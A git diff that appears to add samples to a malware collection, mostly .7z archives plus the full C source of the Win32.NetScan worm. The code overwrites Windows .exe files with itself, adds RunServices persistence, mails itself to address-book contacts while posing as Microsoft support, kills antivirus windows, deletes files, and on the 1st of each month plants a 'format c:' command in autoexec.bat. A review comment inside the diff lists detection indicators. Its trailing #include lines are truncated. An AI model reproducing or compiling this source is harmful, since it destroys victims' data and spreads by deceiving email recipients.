diff --git a/Win32/Generic Crimeware/Win32.Mydoom.a.7z b/Win32/Generic Crimeware/Win32.Mydoom.a.7z
new file mode 100644
index 00000000..500b466d
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Mydoom.a.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Napsin.7z b/Win32/Generic Crimeware/Win32.Napsin.7z
new file mode 100644
index 00000000..554b3732
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Napsin.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Nes.e.7z b/Win32/Generic Crimeware/Win32.Nes.e.7z
new file mode 100644
index 00000000..3b4c904f
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Nes.e.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Netscan.c b/Win32/Generic Crimeware/Win32.Netscan.c
new file mode 100644
index 00000000..b35fd8f5
--- /dev/null
+++ b/Win32/Generic Crimeware/Win32.Netscan.c
@@ -0,0 +1,245 @@
+#include "netscan.h"
+#pragma hdrstop
+#pragma warning (disable: 4068)
+#pragma warning (disable: 4001)
+#pragma resource "resource.res"
+
+char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
+LPSTR FileEmm386 = "Emm386.exe";
+LPSTR FileSetver = "SetVer.exe";
+LPSTR Nom = "a";
+DWORD ExtInf;
+int Err,ErrSend;
+HANDLE NetScanTime,NetScanHandle,AutoBat;
+HMODULE GetKernLib, GetMapiLib;
+HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
+typedef DWORD(*RegistServProcs)(DWORD,DWORD);
+typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
+typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
+typedef ULONG(*DoMemFree)(LPVOID);
+HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
+
+#pragma argsused
+int APIENTRY WinMain
+(
+HINSTANCE hInstance,
+HINSTANCE hPrevInstance,
+LPSTR lpszCmdLine,
+int nCmdShow
+)
+{
+//Win32.NetScan by ZeMacroKiller98
+//Tous droits r‚serv‚s (c) 2001
+WIN32_FIND_DATA GetFileToInfect;
+OSVERSIONINFO GetOsVer;
+FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
+SYSTEMTIME TriggerScanTime;
+RegistServProcs MyServProcs;
+SendMessInfect SendMessToOther;
+FindUserAddress GetAddressUser;
+DoMemFree GetMemFree;
+GetKernLib = LoadLibrary("kernel32.dll");
+MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
+MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
+SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
+GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
+GetVersionEx(&GetOsVer);
+if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
+{
+ RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
+ RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
+ RegCloseKey(NetScanNTKey);
+}
+else
+{
+ RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
+ RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
+ RegCloseKey(NetScan32Key);
+}
+if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
+{
+ GetMapiLib = LoadLibrary("mapi32.dll");
+ GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
+ SetCurrentDirectory(GetNetScanWinDir);
+ NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
+ NetScanFind:
+ NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+ GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
+ CloseHandle(NetScanTime);
+ if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
+ goto NotInfection;
+ CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
+ NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+ SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
+ CloseHandle(NetScanTime);
+ NotInfection:
+ if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
+ goto NetScanFind;
+ FindClose(NetScanHandle);
+ RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
+ RegCloseKey(CreateNetScan);
+ SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
+ GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
+ GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
+ if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
+ {
+ MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
+ SetCurrentDirectory("C:/");
+ DeleteFile("*.*");
+ ExitProcess(0);
+ }
+MapiMessage stMessage;
+MapiRecipDesc stRecip;
+MapiFileDesc stFile;
+lpMapiRecipDesc lpRecip;
+stFile.ulReserved = 0;
+stFile.flFlags = 0L;
+stFile.nPosition = (ULONG)-1;
+stFile.lpszPathName = GetNetScanPath;
+stFile.lpszFileName = NULL;
+stFile.lpFileType = NULL;
+MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
+UnResolve:
+Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
+if(Err!=SUCCESS_SUCCESS)
+{
+switch(Err){
+ case MAPI_E_AMBIGUOUS_RECIPIENT:
+ MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ break;
+ case MAPI_E_UNKNOWN_RECIPIENT:
+ MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ break;
+ case MAPI_E_FAILURE:
+ MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DeleteFile("*.*");
+ ExitProcess(0);
+ break;
+ case MAPI_E_INSUFFICIENT_MEMORY:
+ MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DeleteFile("*.*");
+ ExitProcess(0);
+ break;
+ case MAPI_E_NOT_SUPPORTED:
+ MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DeleteFile("*.*");
+ ExitProcess(0);
+ break;
+ case MAPI_E_USER_ABORT:
+ MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DeleteFile("*.*");
+ ExitProcess(0);
+ break;
+ }
+goto UnResolve;
+}
+stRecip.ulReserved = lpRecip->ulReserved;
+stRecip.ulRecipClass = MAPI_TO;
+stRecip.lpszName = lpRecip->lpszName;
+stRecip.lpszAddress = lpRecip->lpszAddress;
+stRecip.ulEIDSize = lpRecip->ulEIDSize;
+stRecip.lpEntryID = lpRecip->lpEntryID;
+stMessage.ulReserved = 0;
+stMessage.lpszSubject = "Microsoft NetScan Utility";
+stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
+stMessage.lpszMessageType = NULL;
+stMessage.lpszDateReceived = NULL;
+stMessage.lpszConversationID = NULL;
+stMessage.flFlags = 0L;
+stMessage.lpOriginator = NULL;
+stMessage.nRecipCount = 1;
+stMessage.lpRecips = &stRecip;
+stMessage.nFileCount = 1;
+stMessage.lpFiles = &stFile;
+ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
+if(ErrSend!=SUCCESS_SUCCESS)
+{
+ MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DeleteFile("*.*");
+ ExitProcess(0);
+}
+MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
+ "NetScan Utility",
+ MB_OK|MB_ICONINFORMATION);
+FreeLibrary(GetMapiLib);
+}
+RegCloseKey(NetScanInstall);
+STARTUPINFO NetScanInfo;
+PROCESS_INFORMATION NetScanProc;
+NetScanInfo.cb = sizeof(STARTUPINFO);
+NetScanInfo.lpReserved = NULL;
+NetScanInfo.lpReserved2 = NULL;
+NetScanInfo.cbReserved2 = 0;
+NetScanInfo.lpDesktop = NULL;
+NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
+if(CreateProcess(GetNetScanPath,
+ NULL,
+ (LPSECURITY_ATTRIBUTES)NULL,
+ (LPSECURITY_ATTRIBUTES)NULL,
+ FALSE,
+ 0,
+ NULL,
+ NULL,
+ &NetScanInfo,
+ &NetScanProc))
+{
+CloseHandle(NetScanProc.hProcess);
+CloseHandle(NetScanProc.hThread);
+}
+if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
+ ExitProcess(0);
+SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
+MyServProcs(NetScanProc.dwProcessId,1);
+GetSystemTime(&TriggerScanTime);
+//Close windows which title is WINDOWS
+WindowsHwnd = FindWindow(NULL,"WINDOWS");
+if(WindowsHwnd!=NULL)
+ DestroyWindow(WindowsHwnd);
+//Close access to Symantec HomePage
+SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
+if(SymantecHwnd!=NULL)
+{
+ MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
+ DestroyWindow(SymantecHwnd);
+}
+//Anti Norton Antivirus
+NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
+if(NAVHwnd !=NULL)
+{
+ MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
+ DestroyWindow(NAVHwnd);
+}
+if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
+{
+ mciSendString("open cdaudio",NULL,0,NULL);
+ mciSendString("set cdaudio door open",NULL,0,NULL);
+ mciSendString("close cdaudio",NULL,0,NULL);
+ mciSendString("open cdaudio",NULL,0,NULL);
+ mciSendString("set cdaudio audio all off",NULL,0,NULL);
+ mciSendString("close cdaudio",NULL,0,NULL);
+ MessageBeep(MB_ICONEXCLAMATION);
+}
+if(TriggerScanTime.wDay==1)
+{
+ MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
+ SetCurrentDirectory("C:\\");
+ AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
+ SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
+ WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
+ CloseHandle(AutoBat);
+ ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
+}
+FreeLibrary(GetKernLib);
+return 0;
+}
+
+
+*************************************************************************
+
+#define WIN32_LEAN_AND_MEAN
+#include
+#include
+#include
+#include
+#include
+#include
\ No newline at end of file
diff --git a/Win32/Generic Crimeware/Win32.Null.7z b/Win32/Generic Crimeware/Win32.Null.7z
new file mode 100644
index 00000000..eaa3cc06
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Null.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Nzm.7z b/Win32/Generic Crimeware/Win32.Nzm.7z
new file mode 100644
index 00000000..d8b5525d
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Nzm.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Poshspy.7z b/Win32/Generic Crimeware/Win32.Poshspy.7z
new file mode 100644
index 00000000..6dc779f2
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Poshspy.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Pwnbot.7z b/Win32/Generic Crimeware/Win32.Pwnbot.7z
new file mode 100644
index 00000000..7f8250d5
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Pwnbot.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Rage.7z b/Win32/Generic Crimeware/Win32.Rage.7z
new file mode 100644
index 00000000..4d8a214a
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rage.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Reptile.7z b/Win32/Generic Crimeware/Win32.Reptile.7z
new file mode 100644
index 00000000..b44cb9c1
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Reptile.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Retro.7z b/Win32/Generic Crimeware/Win32.Retro.7z
new file mode 100644
index 00000000..8171bf60
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Retro.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Riot.7z b/Win32/Generic Crimeware/Win32.Riot.7z
new file mode 100644
index 00000000..6642750e
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Riot.7z differ
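Review bot: Win32.Netscan.c is added as plain, uncompressed source with no header saying what it is, while every neighbouring sample in this commit is a .7z archive; it should open with a comment such as `/* MALWARE SAMPLE: Win32.NetScan, MAPI mass-mailer and .exe overwriter. Analysis only; never build or run outside an isolated lab. */`. The same header should list the host indicators visible in WinMain so the file is usable for detection and triage: the `NetScanNT` / `NetScan32` values written under the `RunServices` keys, the `Software\Britney\Install` marker key (the code tests `Software\NetScan\Install` but creates the Britney key, so the first-run branch appears to repeat on every start), the `format c:` line appended to `C:\autoexec.bat` when the day of month is 1, and the window-title checks against Norton AntiVirus and the Symantec update page. The `#include` lines after the `****` separator carry no header names on this page, which looks like lost angle-bracket text and is worth checking against the original file.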
diff --git a/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z b/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z
new file mode 100644
index 00000000..42547cf4
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Rose.c.7z b/Win32/Generic Crimeware/Win32.Rose.c.7z
new file mode 100644
index 00000000..4781f1d4
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rose.c.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Rubilyn.7z b/Win32/Generic Crimeware/Win32.Rubilyn.7z
new file mode 100644
index 00000000..a6ebc7c6
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rubilyn.7z differ
diff --git a/Win32/Generic Crimeware/Win32.Ruff.7z b/Win32/Generic Crimeware/Win32.Ruff.7z
new file mode 100644
index 00000000..e3224b2e
Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Ruff.7z differ